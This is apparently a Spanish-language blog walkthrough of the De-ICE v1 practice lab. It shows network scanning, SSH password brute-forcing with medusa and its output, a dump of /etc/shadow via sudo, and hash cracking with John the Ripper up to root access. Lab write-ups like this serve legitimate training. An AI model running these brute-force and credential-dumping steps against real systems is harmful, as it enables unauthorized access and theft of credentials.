martes, 5 de junio de 2012

[Relato] Entorno de seguridad DE-Ice v1


Esta vez vengo con DE-Ice v1.0.
Las distribuciónes de seguridad pueden ser descargadas desde Heorot.net.

¿Qué necesitaremos?
-Dos máquinas virtuales
-De-ICE v1
-Backtrack 5
-Diccionario de claves comunes inglesas

¿Cuáles serán nuestros objetivos?
-Mapeo de red
-Análisis de red
-Fuerza bruta a servicio
-Fuerza bruta a shadow
-Root

¿Reglas?
-No Exploit

Allá que vamos

Escaneamos las redes para localizar a nuestra presa.
netdiscover
Currently scanning: 192.168.1.0/16 | Screen View: ARP Reply

1 Captured ARP Reply packets, from 1 hosts. Total size: 60
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor
-----------------------------------------------------------------------------
192.168.1.100 08:00:27:b1:50:12 01 060 CADMUS COMPUTER SYSTEMS
Identificamos servicvios con NMAP:
root@bt:/# nmap -sV 192.168.1.100
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-02 22:07 CET
Nmap scan report for 192.168.1.100
Host is up (0.0070s latency).
Not shown: 992 filtered ports
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd (broken: could not bind listening IPv4 socket)
22/tcp open ssh OpenSSH 4.3 (protocol 1.99)
25/tcp open smtp Sendmail 8.13.7/8.13.7
80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open pop3 Openwall popa3d
143/tcp open imap UW imapd 2004.357
443/tcp closed https
MAC Address: 08:00:27:B1:50:12 (Cadmus Computer Systems)
Service Info: Host: slax.example.net; OS: Unix
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 25.29 seconds
Dejando huella

Vemos que tenemnos varios servicios, excepto uno: FTP. No nos permite conexiones IPv4.
Entramos via HTTP, y nos fijamos que la página nos muestra unos correos. Alteremoslos.
Esto fué lo que obtuve:
addams
aadams
adaams
damsaa
adamsa
banterb
bbanter
banterb
anterbb
bbanteerbb
coffeec
cooffec
ccoffee
coooffe
cooofef
coofefc
cooffee
Lanzamos medusa tratando de tener suerte.

medusa -h 192.168.1.100 -U user -P user -M ssh

¡Bingo! Nos encuentra un usuario. Mismo usuario y clave.
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: adaams (3 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: damsaa (4 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: adamsa (5 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: banterb (6 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: bbanter (7 of 17 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.100 User: bbanter Password: bbanter [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: addams (1 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: aadams (2 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: adaams (3 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: damsaa (4 of 17 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: adamsa (5 of 17 complete)
Decepción

Accedo vía SSH:root@bt:/pentest/passwords/john# ssh bbanter@192.168.1.100
bbanter@192.168.1.100's password:
Pero si tratamos de hacer un cat /etc/shadow, como es lógico, nos dirá que nuestro siguiente comando es:

exit

Si antes leemos el /etc/passwd, veremos que el usuario aadams se las trae con otros permisos.

Pidiendo auxilio a la medusa

Intentemos con otro diccionario:
root@bt:/pentest/passwords/john# medusa -h 192.168.1.100 -U user -P list.lst -M ssh
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: fuckyou (578 of 675 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: matthew (579 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: miller (560 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: ou82 (561 of 675 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.1.100 User: aadams Password: nostradamus [SUCCESS]
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: tiger (562 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: trustno1 (563 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: 12345678 (564 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: alex (565 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: windows (566 of 675 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: flipper (567 of 675 complete)
Nos muestra el usuario aadams, con su consiguiente clave.
Entramos via SSH, y obtenemos el fichero.
Root Success

root@bt:/pentest/passwords/john# ssh aadams@192.168.1.100
aadams@192.168.1.100's password:
Linux 2.6.16.
aadams@slax:~$ sudo cat /etc/shadow
Password:
root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
aadams@slax:~$
Salimos.
exit
Crackeamos.
root@bt:/pentest/passwords/john# ./john --rules --wordlist=list.lst shadow
El resultado se lo dejo a su imaginación, para no estropear el reto, regalando la clave.
Resultado final:
root@bt:/pentest/passwords/john# ssh aadams@192.168.1.100
aadams@192.168.1.100's password:
Linux 2.6.16.
aadams@slax:~$ su
Password: *****
root@slax:/home/aadams# whoami
root
root@slax:/home/aadams#
Hasta la próxima.

Dedicación: OverSec.org, RemoteExecution.info, http://malware-reversing.com.ar, CPH

Saludos
Publicado por en
Etiquetas: , , , , , , , , , , , , , , , , , , ,

No hay comentarios:

Publicar un comentario

Suscribirse a: Enviar comentarios (Atom)